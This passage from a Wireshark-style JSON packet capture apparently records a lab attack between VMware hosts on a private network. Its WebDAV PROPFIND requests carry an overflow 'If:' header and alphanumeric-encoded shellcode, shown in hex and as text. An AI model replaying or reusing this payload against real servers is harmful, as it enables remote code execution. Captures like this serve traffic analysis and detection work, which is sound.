1:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/zBvBbTvDEaTgQfoQdnSTeHBwaQQTelILNVCLnjrGzkBhKivJxjzrylBM<42><4D><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/QbEGqfeFleNfxIyzyOjpYRuxzehSlisTSwHykrcTwNsdCzrLarwwcNqe<71><65><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "685"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.985382000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.985382000",
|
||
"frame.time_delta": "0.000007000",
|
||
"frame.time_delta_displayed": "0.016294000",
|
||
"frame.time_relative": "17.236322000",
|
||
"frame.number": "696",
|
||
"frame.len": "239",
|
||
"frame.cap_len": "239",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "225",
|
||
"ip.id": "0x00007bc9",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000b4e6",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "40899",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "40899",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "91",
|
||
"tcp.len": "173",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "172382115",
|
||
"tcp.nxtseq": "1622",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "330840793",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000206c",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:f9:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:f9:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868793",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000399000",
|
||
"tcp.analysis.bytes_in_flight": "1621",
|
||
"tcp.analysis.push_bytes_sent": "1621"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000684000",
|
||
"tcp.time_delta": "0.000007000"
|
||
},
|
||
"tcp.payload": "61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "695",
|
||
"tcp.segment": "696",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1621",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4e:6f:57:50:61:51:69:55:75:54:52:43:68:63:56:62:65:65:52:7a:67:4f:55:42:46:72:58:68:6e:4a:51:69:68:62:78:77:4c:54:6e:52:58:6d:48:52:78:46:71:72:42:56:6a:69:69:52:72:e6:bd:94:e5:99:b4:e7:9d:a3:e7:99:8c:e5:91:b9:e6:b1:b2:e7:a5:a3:e5:a5:81:e4:b9:8f:e7:a1:a5:e7:89:96:e4:b1:a7:e4:b1:b0:e7:91:89:e4:a9:8c:e7:85:9a:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:ad:9a:e5:89:87:e6:a5:a4:e4:a9:9a:e4:9d:87:e6:bd:99:e7:a5:b3:e4:b1:93:e4:a1:b3:e4:89:93:e5:8d:b6:e4:a9:90:e6:91:b1:e7:a1:92:e5:99:87:e4:91:8d:e5:a5:a9:e4:85:a8:e6:b5:b2:e7:81:89:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:69:56:4e:6e:66:4b:74:41:64:4b:63:64:72:71:76:74:67:4b:4f:4e:42:4b:71:79:71:64:49:48:47:45:78:63:61:4d:6c:4c:48:49:55:6d:6c:41:64:62:58:4e:77:4a:4a:6f:74:59:54:50:46:e7:9d:b7:e5:89:b3:e4:89:98:e7:a1:90:e6:91:a8:e7:81:ae:e7:95:97:e4:a5:83:e4:89:86:e4:a5:a5:e4:b5:94:e6:a9:a5:e4:b5:84:e4:8d:b3:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:a5:84:e7:99:b9:e7:a5:a1:e6:91:b0:e1:8f:80:e6:a0:83:e7:99:82:e4:a9:95:e6:89:b4:e7:89:a9:e6:bd:9a:e4:b1:a9:e7:89:97:e4:a5:86:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
